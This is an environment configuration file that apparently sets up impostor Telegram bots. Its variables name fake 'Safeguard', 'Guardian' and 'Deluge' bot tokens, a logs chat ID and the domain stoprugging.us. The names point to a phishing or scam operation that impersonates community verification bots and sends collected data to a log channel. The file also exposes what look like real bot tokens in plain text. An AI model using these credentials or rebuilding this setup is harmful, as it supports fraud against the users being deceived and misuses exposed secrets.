PORT=80
FAKE_SAFEGUARD_BOT_TOKEN=8175216871:AAHRXERDA3HHFs4MC8LRgoHG52CNOYO2qUs
FAKE_GUARDIAN_BOT_TOKEN=8141228630:AAGQizvTyyfbFTFqV_jYqEKGqJeuWkx-IZ4
FAKE_DELUGE_BOT_TOKEN=7926709301:AAHMlh58aQMD3zxbIqwQqjUVTIgEE5D_oFY
LOGS_ID=6841645424
DOMAIN=https://stoprugging.us
